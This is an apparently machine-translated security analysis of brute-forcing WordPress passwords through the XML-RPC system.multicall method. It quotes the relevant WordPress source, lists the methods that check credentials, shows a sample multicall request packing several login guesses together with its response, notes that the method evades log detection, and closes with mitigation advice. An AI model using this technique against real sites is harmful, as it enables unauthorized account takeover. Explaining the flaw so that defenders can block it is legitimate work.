Analysis on the efficient cracking principle of WordPress using XMLRPC
Xmlrpc is an interface for remote calls in WordPress, and it was proposed and exploited a long time ago to use xmlrpc to call the interface for account brute-force cracking. SUCURI recently published an article about how to use xmlrpc to call the system in the interface. multicall improves the brute-force cracking Efficiency, allowing thousands of account and password combinations to complete one request, greatly compressing the number of requests, and avoiding log detection to a certain extent.
0x01 Principle Analysis
The definition code for the xmlrpc service in WordPress is mainly located in wp-initdes/class-IXR.php and wp-initdes/class-wp-xmlrpc-server.php. The base class IXR_Server defines three built-in call Methods: system. getCapabilities, system. listMethods, and system. multicall. The call ing is located in the IXR_Server base class definition:
function setCallbacks(){ $this->callbacks['system.getCapabilities'] = 'this:getCapabilities'; $this->callbacks['system.listMethods'] = 'this:listMethods'; $this->callbacks['system.multicall'] = 'this:multiCall';}
When the base class is initialized, setCallbacks () is called to bind the call ing relationship:
Function _ construct ($ callbacks = false, $ data = false, $ wait = false) {$ this-> setCapabilities (); if ($ callbacks) {$ this-> callbacks = $ callbacks;} $ this-> setCallbacks (); // bind the default three basic call mappings if (! $ Wait) {$ this-> serve ($ data );}}
Let's take a look at the corresponding processing functions of system. multicall:
function multiCall($methodcalls){ // See http://www.xmlrpc.com/discuss/msgReader$1208 $return = array(); foreach ($methodcalls as $call) { $method = $call['methodName']; $params = $call['params']; if ($method == 'system.multicall') { $result = new IXR_Error(-32600, 'Recursive calls to system.multicall are forbidden'); } else { $result = $this->call($method, $params); } if (is_a($result, 'IXR_Error')) { $return[] = array( 'faultCode' => $result->code, 'faultString' => $result->message ); } else { $return[] = array($result); } } return $return;}
It can be seen from the code that the program will parse the XML passed by the request, traverse each interface in multiple calls to call the request, and return the final call results together to the request end.
In this way, 500 or even 10000 types of account passwords can be cracked and included in a request. The server will soon finish processing and return results, which greatly improves the efficiency of brute-force cracking, multiple call interfaces are used to compress the number of requests. If you attempt to use a password of 10000 accounts, only one access log is left on the target server, which avoids Log Security Detection to a certain extent.
By reading the xmlrpc-related code in WordPress, a large number of xmlrpc calls can verify the user name and password:
if ( !$user = $this->login($username, $password) ) return $this->error;
By searching the preceding logon verification code, you can obtain a list of all calling methods that can be used for brute-force cracking:
wp.getUsersBlogs, wp.newPost, wp.editPost, wp.deletePost, wp.getPost, wp.getPosts, wp.newTerm, wp.editTerm, wp.deleteTerm, wp.getTerm, wp.getTerms, wp.getTaxonomy, wp.getTaxonomies, wp.getUser, wp.getUsers, wp.getProfile, wp.editProfile, wp.getPage, wp.getPages, wp.newPage, wp.deletePage, wp.editPage, wp.getPageList, wp.getAuthors, wp.getTags, wp.newCategory, wp.deleteCategory, wp.suggestCategories, wp.getComment, wp.getComments, wp.deleteComment, wp.editComment, wp.newComment, wp.getCommentStatusList, wp.getCommentCount, wp.getPostStatusList, wp.getPageStatusList, wp.getPageTemplates, wp.getOptions, wp.setOptions, wp.getMediaItem, wp.getMediaLibrary, wp.getPostFormats, wp.getPostType, wp.getPostTypes, wp.getRevisions, wp.restoreRevision, blogger.getUsersBlogs, blogger.getUserInfo, blogger.getPost, blogger.getRecentPosts, blogger.newPost, blogger.editPost, blogger.deletePost, mw.newPost, mw.editPost, mw.getPost, mw.getRecentPosts, mw.getCategories, mw.newMediaObject, mt.getRecentPostTitles, mt.getPostCategories, mt.setPostCategories
Here, we use parameter transfer to test wp. getUsersBlogs, which is the most direct method for obtaining information. The two account and password attempts are included in the same request and the XML request content is constructed as follows:
system.multicall
methodName
wp.getUsersBlogs
params
admin
admin888
methodName
wp.getUsersBlogs
params
guest
test
Send the preceding XML request containing two sub-calls to the xmlrpc server portal. If the xmlrpc service is enabled, the following information is returned:
IsAdmin
1
Url
Http: // 172.16.96.130/xampp/wordpress-4.3.1/
Blogid
1
BlogName
WordPress 4.3.1
Xmlrpc
Http: /172.16.96.130/xampp/wordpress-4.3.1/xmlrpc. php
FaultCode
403
FaultString
The user name or password is incorrect.
The results show that two account and password combinations are processed in the same request and the results are returned in a centralized manner. In this way, the account brute-force cracking efficiency can be greatly improved.
0x02 protection suggestions
This problem still exists in the latest WordPress version (4.3.1. Multi-call (multicall) is the standard of xmlrpc. To prevent attackers from using this point to launch brute-force attacks on the website, the following protection suggestions are provided:
Configure Web servers such as Apache and Nginx to restrict xmlrpc. php file access. xmlrpc can be deleted without affecting the website operation. php file; install and enable the Disable XML-RPC from the official plug-in Library; Add code add_filter ('xmlrpc _ enabled', '_ return_false'); To the WordPress configuration file wp-config.php;